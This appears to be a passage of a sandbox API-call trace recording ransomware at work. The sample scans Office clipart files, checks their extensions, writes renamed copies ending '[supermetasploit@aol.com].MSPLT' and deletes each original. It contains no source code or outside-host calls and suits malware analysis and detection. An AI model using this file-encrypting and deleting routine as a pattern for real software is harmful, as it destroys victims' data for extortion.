lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.652] lstrlenW (lpString=".dbf") returned 4 [0319.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.652] lstrlenW (lpString=".1cd") returned 4 [0319.652] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.652] lstrlenW (lpString=".jpg") returned 4 [0319.652] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.653] lstrlenW (lpString=".doc") returned 4 [0319.653] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.653] lstrlenW (lpString=".docx") returned 5 [0319.653] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.653] lstrlenW (lpString=".pdf") returned 4 [0319.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.653] lstrlenW (lpString=".xls") returned 4 [0319.653] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.653] lstrlenW (lpString=".xlsx") returned 5 [0319.653] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.653] lstrlenW (lpString=".ppt") returned 4 [0319.653] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.653] lstrlenW (lpString=".zip") returned 4 [0319.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.653] lstrlenW (lpString=".rar") returned 4 [0319.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.653] lstrlenW (lpString=".bz2") returned 4 [0319.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.653] lstrlenW (lpString=".7z") returned 3 [0319.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.653] lstrlenW (lpString=".dbf") returned 4 [0319.654] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.654] lstrlenW (lpString=".1cd") returned 4 [0319.654] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.654] lstrlenW (lpString=".jpg") returned 4 [0319.654] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.654] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.654] lstrlenW (lpString="DD00448_.WMF") returned 12 [0319.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.655] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2952) returned 1 [0319.655] CloseHandle (hObject=0x534) returned 1 [0319.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf")) returned 0x220 [0319.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.656] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.656] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.657] GetLastError () returned 0x0 [0319.657] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xb88, lpOverlapped=0x0) returned 1 [0319.659] WriteFile (in: hFile=0x538, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xb90, lpOverlapped=0x0) returned 1 [0319.661] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.661] WriteFile (in: hFile=0x538, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.662] SetEndOfFile (hFile=0x538) returned 1 [0319.662] CloseHandle (hObject=0x538) returned 1 [0319.662] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.662] SetEndOfFile (hFile=0x534) returned 1 [0319.673] CloseHandle (hObject=0x534) returned 1 [0319.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf")) returned 1 [0319.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.951] lstrlenW (lpString=".doc") returned 4 [0319.951] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.951] lstrlenW (lpString=".docx") returned 5 [0319.952] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.952] lstrlenW (lpString=".pdf") returned 4 [0319.952] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString=".xls") returned 4 [0319.952] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.952] lstrlenW (lpString=".xlsx") returned 5 [0319.952] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.952] lstrlenW (lpString=".ppt") returned 4 [0319.952] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.952] lstrlenW (lpString=".zip") returned 4 [0319.952] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.952] lstrlenW (lpString=".rar") returned 4 [0319.952] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString=".bz2") returned 4 [0319.952] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString=".7z") returned 3 [0319.952] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.952] lstrlenW (lpString=".dbf") returned 4 [0319.952] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.952] lstrlenW (lpString=".1cd") returned 4 [0319.952] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.952] lstrlenW (lpString=".jpg") returned 4 [0319.952] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.953] lstrlenW (lpString=".doc") returned 4 [0319.953] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString=".docx") returned 5 [0319.953] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.953] lstrlenW (lpString=".pdf") returned 4 [0319.953] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString=".xls") returned 4 [0319.953] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.953] lstrlenW (lpString=".xlsx") returned 5 [0319.953] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.953] lstrlenW (lpString=".ppt") returned 4 [0319.953] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.953] lstrlenW (lpString=".zip") returned 4 [0319.953] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.953] lstrlenW (lpString=".rar") returned 4 [0319.953] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString=".bz2") returned 4 [0319.953] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString=".7z") returned 3 [0319.953] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.953] lstrlenW (lpString=".dbf") returned 4 [0319.953] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.953] lstrlenW (lpString=".1cd") returned 4 [0319.953] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 68 [0319.953] lstrlenW (lpString=".jpg") returned 4 [0319.953] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.954] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.954] lstrlenW (lpString="DD01039_.WMF") returned 12 [0319.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x558 [0319.955] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=14820) returned 1 [0319.955] CloseHandle (hObject=0x558) returned 1 [0319.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf")) returned 0x220 [0319.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x558 [0319.956] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.957] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x55c [0319.958] GetLastError () returned 0x0 [0319.958] ReadFile (in: hFile=0x558, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x39e4, lpOverlapped=0x0) returned 1 [0320.128] WriteFile (in: hFile=0x55c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x39f0, lpOverlapped=0x0) returned 1 [0320.130] ReadFile (in: hFile=0x558, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.130] WriteFile (in: hFile=0x55c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.130] SetEndOfFile (hFile=0x55c) returned 1 [0320.130] CloseHandle (hObject=0x55c) returned 1 [0320.130] SetFilePointerEx (in: hFile=0x558, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.130] SetEndOfFile (hFile=0x558) returned 1 [0320.143] CloseHandle (hObject=0x558) returned 1 [0320.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.327] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf")) returned 1 [0320.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.329] lstrlenW (lpString=".doc") returned 4 [0320.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.329] lstrlenW (lpString=".docx") returned 5 [0320.329] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.329] lstrlenW (lpString=".pdf") returned 4 [0320.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.329] lstrlenW (lpString=".xls") returned 4 [0320.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.329] lstrlenW (lpString=".xlsx") returned 5 [0320.329] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.329] lstrlenW (lpString=".ppt") returned 4 [0320.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.330] lstrlenW (lpString=".zip") returned 4 [0320.330] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.330] lstrlenW (lpString=".rar") returned 4 [0320.330] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.330] lstrlenW (lpString=".bz2") returned 4 [0320.330] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.330] lstrlenW (lpString=".7z") returned 3 [0320.330] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.330] lstrlenW (lpString=".dbf") returned 4 [0320.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.330] lstrlenW (lpString=".1cd") returned 4 [0320.330] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.330] lstrlenW (lpString=".jpg") returned 4 [0320.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.331] lstrlenW (lpString=".doc") returned 4 [0320.331] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.331] lstrlenW (lpString=".docx") returned 5 [0320.331] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.331] lstrlenW (lpString=".pdf") returned 4 [0320.331] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.331] lstrlenW (lpString=".xls") returned 4 [0320.331] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.331] lstrlenW (lpString=".xlsx") returned 5 [0320.331] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.331] lstrlenW (lpString=".ppt") returned 4 [0320.331] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.331] lstrlenW (lpString=".zip") returned 4 [0320.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.331] lstrlenW (lpString=".rar") returned 4 [0320.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.331] lstrlenW (lpString=".bz2") returned 4 [0320.332] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.332] lstrlenW (lpString=".7z") returned 3 [0320.332] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.332] lstrlenW (lpString=".dbf") returned 4 [0320.332] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.332] lstrlenW (lpString=".1cd") returned 4 [0320.332] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0320.332] lstrlenW (lpString=".jpg") returned 4 [0320.332] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.332] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.332] lstrlenW (lpString="DD01145_.WMF") returned 12 [0320.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.537] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2780) returned 1 [0320.537] CloseHandle (hObject=0x53c) returned 1 [0320.537] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf")) returned 0x220 [0320.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0320.539] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.539] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0320.540] GetLastError () returned 0x0 [0320.540] ReadFile (in: hFile=0x53c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xadc, lpOverlapped=0x0) returned 1 [0320.543] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xae0, lpOverlapped=0x0) returned 1 [0320.545] ReadFile (in: hFile=0x53c, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.545] WriteFile (in: hFile=0x52c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.545] SetEndOfFile (hFile=0x52c) returned 1 [0320.545] CloseHandle (hObject=0x52c) returned 1 [0320.545] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.546] SetEndOfFile (hFile=0x53c) returned 1 [0320.551] CloseHandle (hObject=0x53c) returned 1 [0320.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf")) returned 1 [0320.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.553] lstrlenW (lpString=".doc") returned 4 [0320.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.553] lstrlenW (lpString=".docx") returned 5 [0320.553] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.553] lstrlenW (lpString=".pdf") returned 4 [0320.553] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.553] lstrlenW (lpString=".xls") returned 4 [0320.553] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.553] lstrlenW (lpString=".xlsx") returned 5 [0320.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.554] lstrlenW (lpString=".ppt") returned 4 [0320.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.554] lstrlenW (lpString=".zip") returned 4 [0320.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.554] lstrlenW (lpString=".rar") returned 4 [0320.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.554] lstrlenW (lpString=".bz2") returned 4 [0320.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.554] lstrlenW (lpString=".7z") returned 3 [0320.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0320.554] lstrlenW (lpString=".dbf") returned 4 [0320.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.554] lstrlenW (lpString="C:\\Program Files\\Microsoft 